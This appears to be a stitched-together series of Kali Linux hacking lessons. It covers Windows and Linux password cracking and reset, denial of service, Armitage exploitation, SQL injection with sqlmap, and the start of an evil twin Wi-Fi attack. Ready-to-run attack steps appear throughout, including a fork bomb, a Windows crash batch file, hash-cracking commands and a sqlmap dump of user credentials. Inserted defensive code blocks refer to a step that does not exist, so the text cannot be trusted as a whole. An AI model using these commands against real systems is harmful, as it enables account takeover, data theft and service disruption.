Insert the USB live CD and boot your PC. Make sure Boot from USB is the first option in the boot menu in the BIOS. Boot the Windows machine with the live CD. On the Kali Linux boot menu, select Live (forensic mode). Kali Linux initializes, and when it has loaded it will open a terminal window; navigate to the Windows password database file.

Crack the Windows password with ophcrack:

After loading live Kali Linux, go to the system menu > ophcrack and click OK. Ophcrack uses rainbow tables to crack NTLM and LM hashes into plain text; it's a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. If you have a complex password it will take a lot longer than simple passwords, and with the free tables your password may never be cracked. Once the crack is done you will see the password in plain text; write it down and reboot the machine to log in. If your password isn't cracked, you can also log in as one of the other users with admin rights and then change your password from within Windows. With the free tables available you will not be able to crack every password, but the paid tables range from $100 to $1000. Windows uses NTLM hashes to encrypt the password file, which gets stored in the SAM file. We simply need to target this file to retrieve the password. Now you can see the ophcrack application window.
Here, click on Load > Encrypted SAM. After that we need to give the path to the SAM directory, which by default is /mnt/hda1/WINDOWS/System32; click Choose. Here we can see the saved hashes, now with the username and user ID. Now click on the Crack button and wait for the password. It's quick and easy. That's it. It'll show the password if you succeed with the free tables.

I downloaded the XP free small and the Vista free tables. Once you have downloaded the tables you will need to unzip them into separate folders. I made a folder called "hash-tables" and then made 2 more folders within it, one for each table to unzip to. Run the program and click on the "Tables" button. Select the table you downloaded and click "Install", navigate to the folder where you unzipped the table, select it and then click "OK". You should see green lights next to the tables you installed.

Reset Windows password with chntpw:

Navigate to the Windows password database file. In almost all versions of Windows the passwords are saved in the SAM file. This file is usually located under /Windows/System32/config. On your system it may look something like this: /media/hda1/Windows/System32/config. The SAM database is usually in /media/name_of_hard_drive/Windows/System32/config.

Type the command chntpw -l SAM and it will list all the usernames that are contained on the Windows system.

#chntpw -l SAM

The command gives us a list of usernames on the system. When we have the username we want to modify, we simply run the command:

chntpw -u "username" SAM

In the example below we typed:

#chntpw -u "Sanjai sathish" SAM

and we get the following menu. We now have the option of clearing the password, changing the password, or promoting the user to administrator. Changing the password does not always work on Windows 7 and 8 systems; it may work on XP systems, so it is recommended to clear the password. You will then be able to log in with a blank password.
You can also promote the user to a local administrator as well.

Crack the password in Linux using John the Ripper:

John the Ripper is a fast password cracker. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.

John the Ripper is a popular dictionary-based password cracking tool. It uses a wordlist full of passwords and then tries to crack a given password hash using each of the passwords from the wordlist. In other words, it's called brute-force password cracking and is the most basic form of password cracking. It is also the most time- and CPU-consuming technique: the more passwords to try, the more time required. But still, if you want to crack a password locally on your system then john is one of the good tools to try. John is in the top 10 security tools in Kali Linux.

In this topic I am going to show you how to use the unshadow command along with john to crack the passwords of users on a Linux system. On Linux the username/password details are stored in the following 2 files:

/etc/passwd
/etc/shadow

The actual password hash is stored in /etc/shadow, and this file is only accessible with root access to the machine. So try to get this file from your own Linux system, or first create a new user with a simple password. I will create a new user on my Linux system named happy, with password chess. Now that our new user is created, it's time to crack his password.

#unshadow

The unshadow command will basically combine the data of /etc/passwd and /etc/shadow to create 1 file with username and password details. Usage is quite simple:

#unshadow /etc/passwd /etc/shadow > ~/crack

We redirected the output of the unshadow command to a new file called crack. Now this new file shall be cracked by john.
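Two things in this walkthrough are worth seeing in code from the defending side: the 13-character DES(Unix) string that hash-identifier reported in Step 7.a above, and the passwd/shadow merge that unshadow performs here. The following is an added example, not part of the original lesson or of john's own code, that performs that merge on constructed sample files and audits each shadow entry for the hashing scheme in use, flagging the schemes a wordlist run gets through quickly; the account names, the hash placeholders and the WEAK set are assumptions made for the demonstration.

```python
import re

# Constructed /etc/passwd and /etc/shadow excerpts (not copied from any real
# system). The $-prefixed hashes are shortened placeholders of the right shape;
# only the prefix and, for DES, the 13-character length matter here.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
happy:x:1001:1001::/home/happy:/bin/bash
legacy:x:1002:1002::/home/legacy:/bin/sh
svc:x:1003:1003::/var/lib/svc:/usr/sbin/nologin
"""

SHADOW = """\
root:$6$Zq1Rn8xw$PLACEHOLDERsha512cryptHASH:19000:0:99999:7:::
happy:$1$Rn8xZq1w$PLACEHOLDERmd5crypt:19000:0:99999:7:::
legacy:24iYBc17xK0e.:19000:0:99999:7:::
svc:!:19000:0:99999:7:::
"""

# Traditional DES crypt: 2-character salt + 11 characters, all from this alphabet.
DES_CRYPT = re.compile(r"[./0-9A-Za-z]{13}")

# Modular-crypt prefixes and the algorithms they denote.
PREFIXES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}

# Schemes a wordlist run like the ones above gets through quickly: descrypt
# keeps only the first 8 characters of the password and uses a 12-bit salt,
# and md5crypt is cheap enough to test at very high rates on a GPU.
WEAK = {"descrypt", "md5crypt"}


def hash_algorithm(field):
    """Name the scheme behind the password field of one shadow entry."""
    if field == "":
        return "empty"
    if field.startswith(("!", "*")):
        return "locked"
    for prefix, name in PREFIXES.items():
        if field.startswith(prefix):
            return name
    if DES_CRYPT.fullmatch(field):
        return "descrypt"
    return "unknown"


def _entries(text):
    """Yield (name, second_field) for each non-comment line of a colon file."""
    for line in text.splitlines():
        if line and not line.startswith("#"):
            name, field = line.split(":", 2)[:2]
            yield name, field


def unshadow(passwd_text, shadow_text):
    """Merge the two files the way unshadow(8) does: the 'x' placeholder in the
    passwd password field is replaced by the hash from shadow."""
    hashes = dict(_entries(shadow_text))
    merged = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def audit_shadow(shadow_text):
    """Return [(user, algorithm, is_weak)] for every account in shadow_text."""
    return [(user, hash_algorithm(field), hash_algorithm(field) in WEAK)
            for user, field in _entries(shadow_text)]


if __name__ == "__main__":
    for line in unshadow(PASSWD, SHADOW):
        print(line)
    for user, algo, weak in audit_shadow(SHADOW):
        print(f"{user:8} {algo:12} {'WEAK - migrate' if weak else 'ok'}")
```

The practical outcome of the audit is a migration list: any account still stored with descrypt or md5crypt should have its password re-hashed with sha512crypt or yescrypt at next login, which on most distributions means setting ENCRYPT_METHOD in /etc/login.defs and expiring the affected passwords.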
For the wordlist we shall be using the password list that comes with john on Kali Linux. It is located at the following path: /usr/share/john/password.lst. Or you can use your own password lists too.

#john --wordlist=/usr/share/john/password.lst ~/crack

Use the "--show" option to display all of the cracked passwords reliably. So in the above command john was able to crack the hash and get us the password "chess" for the user "happy". Now john was able to crack it only because the password "chess" was present in the password list. If it were not there, then john would have failed. Use the show option to list all the cracked passwords:

#john --show ~/crack

Just like most other things associated with hacking, a denial of service attack is not everyone's cup of tea. It can, however, be understood if explained properly. In this tutorial I'll try to give you the big picture of denial of service attacks before I start using geeky terms like packets and all that. We'll start at the easiest point.

What effect does a denial of service attack have?

Wireless hacking usually gives you the password of a wireless network. A man-in-the-middle attack lets you spy on network traffic. Exploiting a vulnerability and sending a payload gives you access to and control over the target machine. What exactly does a Denial of Service (DOS) attack do? Basically, it robs the legitimate owner of a resource of the right to use it. I mean, if I successfully perform a DOS on your machine, you won't be able to use it any more. In the modern scenario it is used to disrupt online services. Many hacktivist groups (internet activists who use hacking as a form of active resistance; a name worth mentioning here is Anonymous) carry out distributed denial of service attacks on government and private websites to make them listen to the people's opinion (the legitimacy of this method of dictating your opinion has been a topic of debate, and a lot of hacktivists have had to suffer jail time for participating in DDOS).
So basically it's just what its name suggests: denial of service.

Basic Concept

It uses the fact that while a service can be more than sufficient to cater to the demands of the intended users, a drastic increase in unwelcome users can make the service go down. Most of us use phrases like "This website was down the other day" without any idea what it actually means. Well, now you do. To give you a good idea of what is happening, I'll take the example from the movie "We Are Legion".

Scenario One: Multiplayer online game

Now consider you are playing an online multiplayer game. There are millions of other people who also play this game. Now there's a pool in the game that everyone likes to visit. Now you and your friends know that you have the power of numbers. There are a lot of you, and together you decide to make identical characters in the game. And then all of you go and block access to the pool. You just carried out a denial of service attack. The users of the game have now been deprived of a service which they obtained the right to use when they signed up for the game. This is just what the guys at 4chan (birthplace and residence of Anonymous) did a long time ago: they made a swastika and blocked access to the pool. This is the kind of thing that gives you a very basic idea of what a denial of service attack can be.

Scenario 2: Bus stop

Now assume that for some reason you want to disrupt the bus service of your city and stop people from using the service. To stop the legitimate people from utilizing this service, you can call your friends to use it unnecessarily. Basically you can invite millions of friends to come and crowd around all the bus stops and take the buses without any purpose. Practically it is not feasible, since you don't have millions of friends, and they are definitely not wasting their time and money riding aimlessly from one place to another.
So while this may seem impossible in the real world, in the virtual world you alone can cause as much load as a thousand (or even a million) users at the click of a button. There are many tools out there for this purpose; however, you are not recommended to use them, as a DOS on someone else is illegal and easy to detect (Knock, knock. It's the police). We will come back to this later and do a DOS on our own computer.

How denial of service attacks are carried out

Basically, when you visit a website, you send them a request to deliver their content to you. What you send is a packet. Actually it takes more than just one packet; you need a lot of them. But still, the bandwidth that you consume in requesting the server to send you some data is very little. In return, the data they send you is huge. This takes up server resources, which they pay for. A legitimate view can easily earn more than the server costs on account of advertisements, etc. So companies buy servers that can provide enough data transfer for their regular users. However, if the number of users suddenly increases, the server gives up. It goes down. And since the company knows it is under DOS, it just turns off the server so that it does not have to waste its monetary resources on a DOS, and waits till the DOS stops.

Now with modern computers and bandwidth, we alone can easily pretend to be a thousand or even more users at once. While this is not good for the server, it is not something that can make it succumb (your computer is not the only thing that gets better with time; the servers do too). However, if a lot of people like you do a DOS attack, it becomes a distributed denial of service attack. This can easily be fatal for a server. It's just like you go to a page and start refreshing it very fast, maybe a thousand times every second. And you are not the only one. There are a thousand others doing the same thing.
So basically you guys are equivalent to more than a million users using the site simultaneously, and that's not something the server can take. Sites like Google and Facebook have stronger servers, and algorithms that can easily identify a DOS and block the traffic from that IP. But it's not just the websites that get better; the black hat hackers too are improving every day. This leaves a huge scope for understanding DOS attacks and becoming an asset to one of these sides (the good, the bad and the ugly).

A Live DOS on your Kali Machine

We are going to execute a command in the Kali Linux terminal that will cripple the operating system and make it hang. It will most probably work on other Linux distributions too.

Warning: This code will freeze Kali Linux, and most probably it will not recover from the shock. You'll lose any unsaved data. You will have to restart the machine the hard way (turn off the virtual machine directly, or cut the power supply if it's a real machine). Just copy and paste the code and your computer is gone.

:(){ :|:& };:

The machine froze right after I pressed Enter. I had to power it off from the VMware interface. What basically happened is that the one-line command asked the operating system to keep opening processes very fast for an infinite period of time. It just gave up.

Here's something for the Windows users

Crashing Windows using a batch file

Open Notepad. Put the following code in it:

:1
start
goto 1

Save the file as name.bat; bat here is the batch file extension. Run it. Game over. It basically executes the second line, and the third line makes it go over to the first, execute the second, and then over to the first again, execute the second... infinitely. So again, denial of service. All the processing power is used by a useless command, while you, the legitimate user, can't do anything.
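The text above says that large sites have algorithms that identify a DOS and block the offending IP; the core of such an algorithm is a per-client sliding-window counter. The following is an added example, not code from the original tutorial, that runs that counter over a constructed stream of (timestamp, client IP) events; the traffic shape, the 100-requests-per-10-seconds threshold and the RFC 5737 documentation addresses are assumptions chosen for the demonstration.

```python
from collections import defaultdict, deque


def find_flooders(events, window_seconds=10, threshold=100):
    """Return the set of client IPs that sent more than `threshold` requests
    inside any sliding window of `window_seconds`.

    `events` is an iterable of (timestamp_seconds, client_ip) pairs in arrival
    order, as a web server's access log would yield them.
    """
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    flagged = set()
    for ts, ip in events:
        window = recent[ip]
        window.append(ts)
        # Drop requests that have fallen out of the window.
        while window and ts - window[0] > window_seconds:
            window.popleft()
        if len(window) > threshold:
            flagged.add(ip)
    return flagged


def sample_events():
    """Constructed traffic (not a real capture): a few ordinary visitors plus
    one client that refreshes the page hundreds of times per second, as the
    text above describes. Addresses are from the RFC 5737 documentation ranges."""
    events = []
    # Ordinary visitors: one request every two seconds for a minute.
    for ip in ("192.0.2.10", "192.0.2.11", "198.51.100.5"):
        for t in range(0, 60, 2):
            events.append((float(t), ip))
    # The flooder: 600 requests between t=20s and t=23s.
    for i in range(600):
        events.append((20.0 + i * 0.005, "203.0.113.7"))
    events.sort()
    return events


if __name__ == "__main__":
    for ip in sorted(find_flooders(sample_events())):
        print(f"rate limit exceeded, candidate for blocking: {ip}")
```

In production this logic normally lives in the reverse proxy (nginx's limit_req, for example) rather than in the application, and the flagged set feeds a temporary block list rather than a permanent one, since addresses behind carrier-grade NAT are shared by many users. The host-side equivalent for the fork bomb above is a per-user process limit (ulimit -u, or nproc in /etc/security/limits.conf), which caps how many processes an unprivileged user can spawn.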
Lesson 10: Introduction to Python

Python is a very diverse programming language and is excellent to learn. Today at codingsec we will run through an introductory tutorial to get you more familiar with how the fundamentals of the language work. The best way to learn to code is to actually put what you read today into practice!

Python is easy to learn:

print("Hello, World!")

Installing Python

In order to get started learning Python, you will need to install the required software. For Python programming you need a working Python installation and a text editor. To download the required software, please go to http://www.python.org/download; you will find numerous download links there. Python is very diverse and compatible whatever operating system you are using.

LINUX, BSD, AND UNIX USERS

You are probably lucky and Python is already installed on your machine. To test it, type python3 on a command line. If you see something like what is shown in the following section, you are set. If you have to install Python, first try to use the operating system's package manager, or go to the repository where your packages are available and get Python 3. Python 3.0 was released in December 2008; all the distributions should have Python 3 available, so you may not need to compile Python 3 from scratch after downloading the source code. Ubuntu and Fedora do have Python 3 binary packages available, but they are not yet the default, so they need to be installed specially.

Roughly, here are the steps to compile Python in UNIX:

Download the .tgz file (use your web browser to get the gzipped tar file from https://www.python.org/downloads/release/python-341).

Uncompress the tar file (put in the correct path to where you downloaded it):

$ tar -xvzf ~/Download/Python-3.4.1.tgz
... list of files as they are uncompressed ...

Change to the directory and tell the computer to compile and install the program:

$ cd Python-3.4.1/
$ ./configure --prefix=$HOME/python3_install
... lots of output. Watch for error messages here ...
$ make
... even more output. Hopefully no error messages ...
$ make install

Add Python 3 to your path. You can test it first by specifying the full path. You should add $HOME/python3_install/bin to your PATH bash variable.

$ ~/python3_install/bin/python3
Python 3.4.1 (... size and date information ...)
[GCC 4.5.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>

The above commands will install Python 3 to your home directory, which is probably what you want, but if you skip the --prefix it will install to /usr/local. If you want to use the IDLE graphical code editor, you need to make sure that the tk and tcl libraries, together with their development files, are installed on the system. You will get a warning during the make phase if these are not available.

MAC USERS

Starting from Mac OS X (Tiger), Python ships by default with the operating system, but you will need to update to Python 3 until OS X starts including Python 3 (check the version by starting python3 in a command line terminal). Also IDLE (the Python editor) might be missing in the standard installation. If you want to (re-)install Python, get the MacOS installer from the Python download site.

WINDOWS USERS

Download the appropriate Windows installer (the x86 MSI installer, if you do not have a 64-bit AMD or Intel chip). Start the installer by double-clicking it and follow the prompts. See https://docs.python.org/3/using/windows.html#installing-python for more information.

CONFIGURING YOUR PATH ENVIRONMENT VARIABLE

The PATH environment variable is a list of folders, separated by semicolons, in which Windows will look for a program whenever you try to execute one by typing its name at a Command Prompt.
You can see the current value of your PATH by typing this command at a Command Prompt:

echo %PATH%

The easiest way to permanently change environment variables is to bring up the built-in environment variable editor in Windows. How you get to this editor is slightly different on different versions of Windows.

On Windows 8: Press the Windows key and type Control Panel to locate the Windows Control Panel. Once you've opened the Control Panel, select View by: Large Icons, then click on System. In the window that pops up, click the Advanced System Settings link, then click the Environment Variables... button.

On Windows 7 or Vista: Click the Start button in the lower-left corner of the screen, move your mouse over Computer, right-click, and select Properties from the pop-up menu. Click the Advanced System Settings link, then click the Environment Variables... button.

On Windows XP: Right-click the My Computer icon on your desktop and select Properties. Select the Advanced tab, then click the Environment Variables... button.

Once you've brought up the environment variable editor, you'll do the same thing regardless of which version of Windows you're running. Under System Variables in the bottom half of the editor, find a variable called PATH. If there is one, select it and click Edit....
Assuming your Python root is C:\Python34, add these two folders to your path (and make sure you get the semicolons right; there should be a semicolon between each folder in the list):

C:\Python34
C:\Python34\Scripts

Note: If you want to double-click and start your Python programs from a Windows folder and not have the console window disappear, you can add the following code to the bottom of each script:

print("Hello World")
# stops console from exiting
end_prog = ""
while end_prog != "q":
    end_prog = input("type q to quit")

INTERACTIVE MODE

Go into IDLE (also called the Python GUI). You should be presented with a window that has some text like this:

Python 3.0 (r30:67503, Dec 29 2008, 21:31:07)
[GCC 4.3.2 20081105 (Red Hat 4.3.2-7)] on linux2
Type "copyright", "credits" or "license()" for more information.
****************************************************************
Personal firewall software may warn about the connection IDLE makes to its subprocess using this computer's internal loopback interface. This connection is not visible on any external interface and no data is sent to or received from the Internet.
****************************************************************
IDLE 3.0
>>>

The >>> is Python's way of telling you that you are in interactive mode. In interactive mode, what you type is immediately run. Try typing 1+1 in. Python will respond with 2. Interactive mode allows you to test out and see what Python will do. If you ever feel you need to play with new Python statements, go into interactive mode and try them out.
CREATING AND RUNNING PROGRAMS

Go into IDLE if you are not already. In the menu at the top, select File, then New File. In the new window that appears, type the following:

print("Hello, World!")

Now save the program: select File from the menu, then Save. Save it as "hello.py" (you can save it in any folder you want). Now that it is saved it can be run. Next, run the program by going to Run, then Run Module (or if you have an older version of IDLE, use Edit, then Run script). This will output Hello, World! in the Python Shell window.

PROGRAM FILE NAMES

It is very useful to stick to some rules regarding the file names of Python programs. Otherwise some things might go wrong unexpectedly. These don't matter as much for programs, but you can have weird problems if you don't follow them for module names (modules will be discussed later).

- Always save the program with the extension .py. Do not put another dot anywhere else in the file name.
- Only use standard characters for file names: letters, numbers, dash (-) and underscore (_).
- White space (" ") should not be used at all (use underscores instead).
- Do not use anything other than a letter (particularly no numbers!) at the beginning of a file name.
- Do not use "non-English" characters (such as ä, ö, ü, å or ß) in your file names, or, even better, do not use them at all when programming.

USING PYTHON FROM THE COMMAND LINE

If you don't want to use Python from the command line, you don't have to; just use IDLE. To get into interactive mode, just type python3 without any arguments. To run a program, create it with a text editor (Emacs has a good Python mode) and then run it with python3 program_name.
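The file-name rules listed above are easy to check mechanically. The following is an added example, not code from the original tutorial, that validates a proposed Python file name against exactly those rules and reports which rule was broken; the function names are my own.

```python
import re

# One pattern that encodes all the rules above: a leading ASCII letter, then
# only ASCII letters, digits, dash or underscore, then exactly one dot and "py".
VALID_NAME = re.compile(r"^[A-Za-z][A-Za-z0-9_-]*\.py$")


def is_valid_program_name(name):
    """True if `name` follows every file-name rule listed above."""
    return VALID_NAME.match(name) is not None


def check_program_name(name):
    """Return the list of rules `name` breaks (empty for a valid name), so a
    beginner sees which rule bit them rather than a bare yes/no."""
    problems = []
    if not name.endswith(".py"):
        problems.append("must end with the extension .py")
    stem = name[:-3] if name.endswith(".py") else name
    if "." in stem:
        problems.append("no dot other than the one before py")
    if any(ch.isspace() for ch in name):
        problems.append("no white space (use underscores instead)")
    if not name.isascii():
        problems.append("no non-English characters such as ä, ö, ü, å or ß")
    if not (stem[:1].isascii() and stem[:1].isalpha()):
        problems.append("must begin with a letter (no numbers)")
    odd = sorted({ch for ch in stem
                  if ch.isascii() and not ch.isalnum()
                  and ch not in "-_." and not ch.isspace()})
    if odd:
        problems.append("only letters, numbers, dash and underscore allowed, "
                        "not: " + " ".join(odd))
    return problems


if __name__ == "__main__":
    for candidate in ("hello.py", "1hello.py", "my program.py",
                      "hello.v2.py", "hällo.py", "report!.py"):
        verdict = check_program_name(candidate) or ["ok"]
        print(f"{candidate!r}: {'; '.join(verdict)}")
```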
RUNNING PYTHON PROGRAMS IN UNIX

If you are using Unix (such as Linux, Mac OS X, or BSD), if you make the program executable with chmod and have as the first line:

#!/usr/bin/env python3

you can run the Python program with ./hello.py like any other command. Thanks for learning!

Lesson 11: Introduction to Armitage

Installing Metasploit

Now Metasploit is not distributed with Kali Linux (it was distributed with BackTrack though). However, Kali has it in its repositories, and it can be easily downloaded and installed by executing:

apt-get install armitage

It will check dependencies, download the required files and install Armitage for you. After it's done, you can start Armitage with the following commands:

service postgresql start
service metasploit start
armitage

You will get a screen like this. Let the settings be as they are, and click Connect. You'll get a prompt like this (most of the time). Now you'll see Armitage making some connections for you. For a short while it might show failure messages (Connection Refused), but after some time Armitage will start, and you'll end up with a window somewhat like this. Now while I do believe that the developer has succeeded in making a tool which permits me to say "I'll take my leave, you can handle stuff from here", I'd still go on for a while, helping you know some basic stuff before I take my leave.

Armitage Basics

Now the tough coding (honestly there wasn't anything tough about that) that you had to do with Metasploit becomes as easy as a click in Armitage. Better yet, you can see exactly what line of code is actually executed when you do something with your mouse. As a start, you should do a quick scan with OS detect. And while it does ask you to enter some stuff now, it is going to be pretty easy; you just have to follow the example given by Armitage with some modification.
First do your old ifconfig in a new terminal to find your IP:

ifconfig

Notice that most of the time the first 6 digits are 192.168. You have to figure out the next 3 digits. After that, you can enter the IP into the Armitage window. Look at the sample it provided, just copy that, replacing the 1 with 154, as in my case. Your final code should be 192.168.154.0/24. The 0/24 means it'll look at all the IPs from 192.168.154.1 to 192.168.154.256. Actually it scans IPs from 192.168.xxx.0 through 192.168.xxx.255. Most of the time you'll find your host in this range; however, to include all IPs from 192.168.0.0 to 192.168.255.255, you may use 192.168.0.0/16. This is the automatically generated code after clicking OK. Now, after a few seconds, you will see the following message, and it tells you exactly what you're supposed to do next. Now a couple of computers with their respective OS icons will show up on your screen. As expected, you'll have to go to Attacks -> Find Attacks. There's no rocket science here, and I'm not putting any more screenshots. After that, right-click on the computer you want to hack, and you'll see an Attack option. Select whichever you want to try and enter the requisites (you learnt how to do information gathering in the previous Metasploit tutorials). Everything will be quite easy, except for the fact that the exploits in the Attack section will be possible exploits, which might or might not work. If you're expecting a click to hack you a Windows 7 machine, then that's just not happening. It might work with an unpatched XP machine: ms03_026_dcom might do the trick, or the netapi one. Good luck playing around with this tool. And here's the official Armitage website (media section link, useful vids and pics there) where you might find some more guidance, though the tool doesn't need any.

Lesson 12: Sql Injection Basics

SQL Injection: How It Works

Introduction

Let's get started at an apparently unrelated point. Let's assume we create a table in SQL.
Now there are three main parts of a database management system, like SQL. They are:

- Creating the structure of a table
- Entering data
- Making queries (and getting meaningful results from data)

Now, when SQL is used to display data on a web page, it is common to let web users input their own queries. For example, if you go to a shopping website to buy a smartphone, you might want to specify what kind of smartphone you want. The site would probably be storing data about phones in a table with columns like Name, Price, Company, Screen Size, OS, etc. Now they allow you to create a query using some sort of user-friendly drop-down-based form which lets you select your budget, preferred company, etc. So basically you, the user, can create queries and request data from their SQL servers. While this automated method of creating queries for you is relatively safe, there is another method of creating queries which can be exploited by us. A URL ending in .php is a direct indication that the website/blog uses SQL to deliver a lot of its data, and that you can execute queries directly by changing the URL. Now basically the data in the SQL tables is protected. However, when we send some rogue commands to the SQL server, it doesn't understand what to do and returns an error. This is a clear indication that with proper coding we can send queries that will make the database 'go berserk' and malfunction, and give us all the otherwise private data of its tables. This attack can be used to obtain confidential data like a list of usernames and passwords of all users on a website.

Steps

1. We have to find a website which is vulnerable to SQL injection (SQLi) attacks. Vulnerability has 2 criteria. Firstly, it has to allow execution of queries from the URL, and secondly, it should show an error for some kind of query or other. An error is an indication of a SQL vulnerability.

2. After we know that a site is vulnerable, we need to execute a few queries to find out what makes it act in an unexpected manner. Then we should obtain information about the SQL version and the number of tables in the database and columns in the tables.

3. Finally we have to extract the information from the tables.

Vulnerabilities are found using your own creativity along with famous dorks (more on this in a later tutorial). For the 2nd and 3rd steps, there are 2 ways to do them:

Manually, using some standard codes available online (and if you know SQL then you can figure most of the stuff out yourself). For example, you can instruct the database to give you all the data from a table by executing the command:

SELECT * FROM Users WHERE UserId = 105 or 1=1

Now, while the first part of the query "UserID=105" may not be true for all users, the condition 1=1 will always be true. So basically the query will be prompted to return all the data about the user for all the users for whom 1=1. Effectively, you have the usernames and passwords and all other information about all the users of the website. The first command is legit and gives you access to the data of srinivas only, and only in the condition where the password is correct. The second statement gives you access to the data of all accounts.

Using some tool: some tools help in making the process easier. You still have to use commands, but using tools is much more practical after you have an idea what is actually happening. I don't recommend all the GUI Windows tools which are found on malware-filled websites and never work. All throughout this blog we have used Kali Linux, and if you really are serious about hacking, there is no reason not to have Kali Linux installed. In Kali Linux there is a great tool called SQLMap that we'll be using.

That's it for this tutorial; you now know how SQL injections work. It might be worth your time learning some SQL on W3Schools till I come up with some other tutorial.
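The "or 1=1" statement above works only because the application pastes the request parameter straight into the SQL text. The following is an added example, not code from the original tutorial, that builds a small in-memory table shaped like the Users table described above, with constructed rows, and runs the same input through a vulnerable lookup and a parameterised one; the table contents and function names are assumptions made for the demonstration.

```python
import sqlite3


def build_demo_db():
    """In-memory table shaped like the Users table in the example above, with
    constructed rows (no real accounts). A real system stores password hashes,
    never passwords; here the column just holds placeholder text."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Users (UserId INTEGER, Name TEXT, PasswordHash TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", [
        (105, "srinivas", "<hash-placeholder-1>"),
        (106, "alice", "<hash-placeholder-2>"),
        (107, "bob", "<hash-placeholder-3>"),
    ])
    return conn


def lookup_vulnerable(conn, user_id):
    """Builds the statement by pasting the request parameter into the SQL
    text, which is the pattern the tutorial exploits: the WHERE clause
    becomes whatever the client sends."""
    query = "SELECT Name FROM Users WHERE UserId = " + user_id
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn, user_id):
    """Validates the type, then binds the value as a parameter, so the SQL
    text is fixed and the input can only ever be compared as a number."""
    try:
        uid = int(user_id)
    except (TypeError, ValueError):
        return []  # reject rather than guess; a real app would return HTTP 400
    return [row[0] for row in conn.execute(
        "SELECT Name FROM Users WHERE UserId = ?", (uid,))]


if __name__ == "__main__":
    db = build_demo_db()
    tautology = "105 or 1=1"   # the injected condition from the text above
    print("vulnerable lookup:", lookup_vulnerable(db, tautology))   # every user
    print("parameterised lookup:", lookup_safe(db, tautology))     # nothing
```

Binding the value with ? keeps the SQL text fixed regardless of input, so the injected condition can never become part of the query; validating the type first is a second, independent layer that also gives the caller a clean error to return.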
Lesson 13: More SQLMap

Hacking Websites Using sqlmap in Kali Linux

SQL version

Boot into your Kali Linux machine, start a terminal, and type

sqlmap -h

It lists the basic options supported by sqlmap. To start with, we'll execute the simplest command, sqlmap -u <URL to inject>. In our case (testphp.vulnweb.com is Acunetix's deliberately vulnerable test site, which you are allowed to scan):

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

If the server is slow to respond, raising --time-sec helps. It is the delay, in seconds, that sqlmap expects its time-based blind payloads to produce (the default is 5); a bigger value makes detection on a slow server more reliable, at the cost of a slower run:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15

Either way, when sqlmap is done it will tell you the MySQL version and some other useful information about the database. (Screenshot of the final result.)

Note: Depending on a lot of factors, sqlmap may sometimes ask you questions that have to be answered yes/no. Typing y means yes and n means no. A few typical questions you might come across:

- A message saying that the back-end DBMS is probably MySQL, asking whether sqlmap should skip the tests for all other DBMSes. Your answer should be yes (y).
- A message asking whether to include tests for specific versions of MySQL. The answer depends on the situation; if you are unsure, it is usually better to say yes.

Enumeration

Databases

In this step we obtain database names, table names, column names and other useful data. First we get the names of the available databases by adding --dbs to the previous command:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

The two databases are acuart and information_schema. We are obviously interested in acuart. information_schema is not a table but a built-in database present on every MySQL server; it describes the structure of the other databases (their tables, columns, privileges and so on) rather than holding the application's data. It is not the kind of information we are after here, but it is what sqlmap itself reads to enumerate the schema, and it can be useful on a number of occasions.

Tables

Now we specify the database of interest with -D and tell sqlmap to list its tables with --tables. The final command is:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

The result should be something like this:

Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

Now we have a list of tables. Following the same pattern, we get a list of columns.

Columns

Specify the database with -D, the table with -T, and then request the columns with --columns (two dashes). I hope you are starting to see the pattern by now. The most appealing table here is users; it might contain the usernames and passwords of registered users of the website (hackers always look for sensitive data). The command is:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

(Screenshot of the column listing.)

Data

If you were following along attentively, you'd expect us to pull data from one of the columns now. That isn't wrong, but it's time to go one step further and pull data from several columns at once. As usual, specify the database with -D, the table with -T and the columns with -C, separated by commas, and request all their data with --dump:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump

Here's the result: John Smith, of course, with the password test and an e-mail address. Okay, nothing great, but in real-world web pentesting you can come across far more sensitive data. Under such circumstances, the right thing to do is mail the admin of the website and tell him to fix the vulnerability ASAP.
Don't get tempted to join the dark side. You don't look pretty behind bars.

That's it for this tutorial. Try looking at other columns and tables and see what you can dig up.

Lesson 14: Evil Twin

Evil Twin Tutorial

You will also need to install a tool, bridge-utils, which doesn't come pre-installed in Kali. No big deal:

apt-get install bridge-utils

Objectives

The whole process can be broken down into the following steps:

1. Finding out about the access point (AP) you want to imitate, and then actually imitating it (i.e. creating another access point with the same SSID and everything). We'll use airmon-ng and airodump-ng to find the necessary information about the network, and airbase-ng to create its twin.
2. Forcing the client to disconnect from the real AP and connect to yours. We'll use aireplay-ng to deauthenticate the client, and a stronger signal to make it connect to our network.
3. Making sure the client doesn't notice that he connected to a fake AP. That basically means providing internet access to the client after he has connected to the fake wireless network. For that we need internet access ourselves, which we route to the client.
4. Have fun: monitor traffic from the client, maybe attack his computer using Metasploit.

PS: The first three are the primary objectives; the last one is optional and not part of the evil twin attack as such. It is rather a man-in-the-middle attack.

(Diagram; picture credits: firewalls.com)

Information Gathering - airmon-ng

To see the available wireless interfaces:

iwconfig

